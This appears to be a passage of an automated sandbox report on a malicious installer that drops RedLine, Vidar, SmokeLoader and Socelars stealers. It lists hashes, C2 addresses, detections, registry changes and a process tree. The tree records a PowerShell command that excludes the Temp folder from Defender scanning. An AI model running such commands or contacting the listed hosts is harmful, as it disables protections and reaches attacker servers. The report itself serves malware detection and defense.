redline | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

Target

setup_x86_x64_install.exe
Size

2.9MB
MD5

3f1f81101d0ce95fdfac97f5913cd662
SHA1

8e615a64e4d72b08926242b7d73a608bdd7e9fce
SHA256

90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
SHA512

a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285

Score

10^/10

redline smokeloader socelars vidar 706 916 jayson aspackv2 backdoor evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

40.5

Botnet

916

https://gheorghip.tumblr.com/

Attributes

profile_id
916

Extracted

Family

redline

Botnet

Jayson

95.181.172.207:56915

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	5424	rundll32.exe	144
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	5424	rundll32.exe	144

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 9 IoCs

resource	yara_rule
behavioral2/memory/4292-272-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/4292-270-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/5084-301-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/4452-340-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/4452-353-0x0000000004DA0000-0x00000000053A6000-memory.dmp	family_redline
behavioral2/memory/4572-375-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/5148-427-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/5684-491-0x000000000041C5E2-mapping.dmp	family_redline
behavioral2/memory/5736-579-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ab4f-149.dat	family_socelars
behavioral2/files/0x000100000001ab4f-176.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/1956-199-0x00000000048C0000-0x0000000004991000-memory.dmp	family_vidar
behavioral2/memory/1956-218-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar
behavioral2/memory/4580-287-0x0000000004880000-0x0000000004951000-memory.dmp	family_vidar
behavioral2/memory/4580-291-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000100000001ab46-123.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab46-122.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab47-121.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab49-129.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab49-128.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab47-127.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 38 IoCs

pid	Process
3116	setup_installer.exe
3012	setup_install.exe
3796	Tue11f251db82fb7b.exe
788	Tue11d7385a978cc.exe
2256	Tue11141271fbe5877f.exe
748	Tue11b9d76a96506.exe
628	Tue11bc0507b56295.exe
3132	Tue118f55232e4.exe
4060	Tue11e4e580f2e8141a3.exe
1956	Tue112c483dd3245d.exe
3620	Tue1109eec571ac.exe
1344	Tue11b9d76a96506.tmp
4300	7213334.exe
4392	Chrome 5.exe
4444	4011936.exe
4520	WerFault.exe
4580	Alfanewfile2.exe
4600	6680710.exe
4656	2.exe
4720	setup.exe
4764	46807GHF____.exe
4840	setup_2.exe
4932	setup_2.tmp
4976	3002.exe
4292	Tue11e4e580f2e8141a3.exe
3744	7894657.exe
4128	jhuuee.exe
836	2566371.exe
2172	7652384.exe
5084	Tue11e4e580f2e8141a3.exe
4820	BearVpn 3.exe
4452	Tue11e4e580f2e8141a3.exe
4100	7431108.exe
4300	7213334.exe
4332	setup_2.exe
4572	Tue11e4e580f2e8141a3.exe
4732	1865374.exe
5236	setup_2.tmp

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2566371.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7894657.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7894657.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2566371.exe

Loads dropped DLL 7 IoCs

pid	Process
3012	setup_install.exe
3012	setup_install.exe
3012	setup_install.exe
3012	setup_install.exe
3012	setup_install.exe
1344	Tue11b9d76a96506.tmp
4932	setup_2.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000100000001ab73-281.dat	themida
behavioral2/files/0x000100000001ab73-294.dat	themida
behavioral2/memory/3744-305-0x0000000000120000-0x0000000000121000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6680710.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7894657.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2566371.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ip-api.com
131	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3744	7894657.exe
836	2566371.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4060 set thread context of 4292	4060	Tue11e4e580f2e8141a3.exe	100
PID 4060 set thread context of 5084	4060	Tue11e4e580f2e8141a3.exe	117
PID 4060 set thread context of 4452	4060	Tue11e4e580f2e8141a3.exe	122
PID 4060 set thread context of 4572	4060	Tue11e4e580f2e8141a3.exe	129

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 20 IoCs

pid	pid_target	Process	procid_target
4716	3620	WerFault.exe	91
4732	4720	WerFault.exe	110
3972	4656	WerFault.exe	106
4988	4720	WerFault.exe	110
4800	3620	WerFault.exe	91
2208	4720	WerFault.exe	110
4772	3620	WerFault.exe	91
4232	4720	WerFault.exe	110
4684	3620	WerFault.exe	91
5412	4720	WerFault.exe	110
5556	4720	WerFault.exe	110
5632	3620	WerFault.exe	91
5800	3620	WerFault.exe	91
6028	4720	WerFault.exe	110
6048	4720	WerFault.exe	110
4520	4720	WerFault.exe	110
3812	3620	WerFault.exe	91
4936	3620	WerFault.exe	91
5636	1500	WerFault.exe	173
1020	5672	WerFault.exe	181

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4492	schtasks.exe
4220	schtasks.exe
6232	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4380	timeout.exe
4812	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5604	taskkill.exe
4716	taskkill.exe
5108	taskkill.exe
4348	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue118f55232e4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue118f55232e4.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
628	Tue11bc0507b56295.exe
628	Tue11bc0507b56295.exe
4012	powershell.exe
4012	powershell.exe
4012	powershell.exe
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
4012	powershell.exe
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe
4732	1865374.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
628	Tue11bc0507b56295.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3796	Tue11f251db82fb7b.exe
Token: SeCreateTokenPrivilege	3132	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	3132	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	3132	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	3132	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	3132	Tue118f55232e4.exe
Token: SeTcbPrivilege	3132	Tue118f55232e4.exe
Token: SeSecurityPrivilege	3132	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	3132	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	3132	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	3132	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	3132	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	3132	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	3132	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	3132	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	3132	Tue118f55232e4.exe
Token: SeBackupPrivilege	3132	Tue118f55232e4.exe
Token: SeRestorePrivilege	3132	Tue118f55232e4.exe
Token: SeShutdownPrivilege	3132	Tue118f55232e4.exe
Token: SeDebugPrivilege	3132	Tue118f55232e4.exe
Token: SeAuditPrivilege	3132	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	3132	Tue118f55232e4.exe
Token: SeChangeNotifyPrivilege	3132	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	3132	Tue118f55232e4.exe
Token: SeUndockPrivilege	3132	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	3132	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	3132	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	3132	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	3132	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	3132	Tue118f55232e4.exe
Token: 31	3132	Tue118f55232e4.exe
Token: 32	3132	Tue118f55232e4.exe
Token: 33	3132	Tue118f55232e4.exe
Token: 34	3132	Tue118f55232e4.exe
Token: 35	3132	Tue118f55232e4.exe
Token: SeDebugPrivilege	2256	Tue11141271fbe5877f.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	4520	WerFault.exe
Token: SeDebugPrivilege	4656	2.exe
Token: SeDebugPrivilege	4444	4011936.exe
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeRestorePrivilege	4732	1865374.exe
Token: SeBackupPrivilege	4732	1865374.exe
Token: SeDebugPrivilege	4820	BearVpn 3.exe
Token: SeDebugPrivilege	2172	7652384.exe
Token: SeDebugPrivilege	4732	1865374.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeDebugPrivilege	4988	WerFault.exe
Token: SeDebugPrivilege	3972	WerFault.exe
Token: SeDebugPrivilege	4800	WerFault.exe
Token: SeDebugPrivilege	4772	WerFault.exe
Token: SeDebugPrivilege	2208	WerFault.exe
Token: SeDebugPrivilege	4100	7431108.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 628 wrote to memory of 3116	628	setup_x86_x64_install.exe	75
PID 628 wrote to memory of 3116	628	setup_x86_x64_install.exe	75
PID 628 wrote to memory of 3116	628	setup_x86_x64_install.exe	75
PID 3116 wrote to memory of 3012	3116	setup_installer.exe	76
PID 3116 wrote to memory of 3012	3116	setup_installer.exe	76
PID 3116 wrote to memory of 3012	3116	setup_installer.exe	76
PID 3012 wrote to memory of 3976	3012	setup_install.exe	79
PID 3012 wrote to memory of 3976	3012	setup_install.exe	79
PID 3012 wrote to memory of 3976	3012	setup_install.exe	79
PID 3012 wrote to memory of 1164	3012	setup_install.exe	80
PID 3012 wrote to memory of 1164	3012	setup_install.exe	80
PID 3012 wrote to memory of 1164	3012	setup_install.exe	80
PID 3012 wrote to memory of 2268	3012	setup_install.exe	81
PID 3012 wrote to memory of 2268	3012	setup_install.exe	81
PID 3012 wrote to memory of 2268	3012	setup_install.exe	81
PID 3012 wrote to memory of 1540	3012	setup_install.exe	82
PID 3012 wrote to memory of 1540	3012	setup_install.exe	82
PID 3012 wrote to memory of 1540	3012	setup_install.exe	82
PID 3012 wrote to memory of 3704	3012	setup_install.exe	83
PID 3012 wrote to memory of 3704	3012	setup_install.exe	83
PID 3012 wrote to memory of 3704	3012	setup_install.exe	83
PID 3012 wrote to memory of 4056	3012	setup_install.exe	84
PID 3012 wrote to memory of 4056	3012	setup_install.exe	84
PID 3012 wrote to memory of 4056	3012	setup_install.exe	84
PID 3012 wrote to memory of 3268	3012	setup_install.exe	85
PID 3012 wrote to memory of 3268	3012	setup_install.exe	85
PID 3012 wrote to memory of 3268	3012	setup_install.exe	85
PID 3012 wrote to memory of 460	3012	setup_install.exe	86
PID 3012 wrote to memory of 460	3012	setup_install.exe	86
PID 3012 wrote to memory of 460	3012	setup_install.exe	86
PID 3012 wrote to memory of 3068	3012	setup_install.exe	87
PID 3012 wrote to memory of 3068	3012	setup_install.exe	87
PID 3012 wrote to memory of 3068	3012	setup_install.exe	87
PID 3012 wrote to memory of 636	3012	setup_install.exe	98
PID 3012 wrote to memory of 636	3012	setup_install.exe	98
PID 3012 wrote to memory of 636	3012	setup_install.exe	98
PID 1540 wrote to memory of 3796	1540	cmd.exe	88
PID 1540 wrote to memory of 3796	1540	cmd.exe	88
PID 1164 wrote to memory of 788	1164	cmd.exe	97
PID 1164 wrote to memory of 788	1164	cmd.exe	97
PID 1164 wrote to memory of 788	1164	cmd.exe	97
PID 3976 wrote to memory of 4012	3976	cmd.exe	96
PID 3976 wrote to memory of 4012	3976	cmd.exe	96
PID 3976 wrote to memory of 4012	3976	cmd.exe	96
PID 460 wrote to memory of 2256	460	cmd.exe	95
PID 460 wrote to memory of 2256	460	cmd.exe	95
PID 2268 wrote to memory of 748	2268	cmd.exe	89
PID 2268 wrote to memory of 748	2268	cmd.exe	89
PID 2268 wrote to memory of 748	2268	cmd.exe	89
PID 4056 wrote to memory of 628	4056	cmd.exe	90
PID 4056 wrote to memory of 628	4056	cmd.exe	90
PID 4056 wrote to memory of 628	4056	cmd.exe	90
PID 3068 wrote to memory of 3132	3068	cmd.exe	94
PID 3068 wrote to memory of 3132	3068	cmd.exe	94
PID 3068 wrote to memory of 3132	3068	cmd.exe	94
PID 3268 wrote to memory of 4060	3268	cmd.exe	93
PID 3268 wrote to memory of 4060	3268	cmd.exe	93
PID 3268 wrote to memory of 4060	3268	cmd.exe	93
PID 636 wrote to memory of 1956	636	cmd.exe	92
PID 636 wrote to memory of 1956	636	cmd.exe	92
PID 636 wrote to memory of 1956	636	cmd.exe	92
PID 3704 wrote to memory of 3620	3704	cmd.exe	91
PID 3704 wrote to memory of 3620	3704	cmd.exe	91
PID 3704 wrote to memory of 3620	3704	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:628
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2268
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        
        PID:748
      - C:\Users\Admin\AppData\Local\Temp\is-S6U6K.tmp\Tue11b9d76a96506.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S6U6K.tmp\Tue11b9d76a96506.tmp" /SL5="$30032,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11b9d76a96506.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\is-PFPE9.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PFPE9.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Executes dropped EXE
        
        PID:4764
        
        C:\Program Files\Windows Security\FMPIWWACLB\ultramediaburner.exe
        
        "C:\Program Files\Windows Security\FMPIWWACLB\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\is-PQM3T.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PQM3T.tmp\ultramediaburner.tmp" /SL5="$50030,281924,62464,C:\Program Files\Windows Security\FMPIWWACLB\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:5772
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\1d-24a83-3bf-43385-cee6fd3367642\Lyxaewamaepe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1d-24a83-3bf-43385-cee6fd3367642\Lyxaewamaepe.exe"
        8⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\0b-44c43-74e-d21af-001465f6bcd4b\Poraevijiwae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0b-44c43-74e-d21af-001465f6bcd4b\Poraevijiwae.exe"
        8⤵
        
        PID:1184
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kquatufi.l5l\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\kquatufi.l5l\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\kquatufi.l5l\GcleanerEU.exe /eufive
        10⤵
        
        PID:6336
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bc4dfxwc.pec\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6256
        
        C:\Users\Admin\AppData\Local\Temp\bc4dfxwc.pec\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\bc4dfxwc.pec\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bc4dfxwc.pec\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bc4dfxwc.pec\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630785712 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:6616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htx0sn2p.guy\anyname.exe & exit
        9⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\htx0sn2p.guy\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\htx0sn2p.guy\anyname.exe
        10⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\htx0sn2p.guy\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\htx0sn2p.guy\anyname.exe" -u
        11⤵
        
        PID:6604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e4vn4tg1.qx2\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6736
        
        C:\Users\Admin\AppData\Local\Temp\e4vn4tg1.qx2\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\e4vn4tg1.qx2\gcleaner.exe /mixfive
        10⤵
        
        PID:6932
        
        C:\Windows\System32\cmd.exe
        
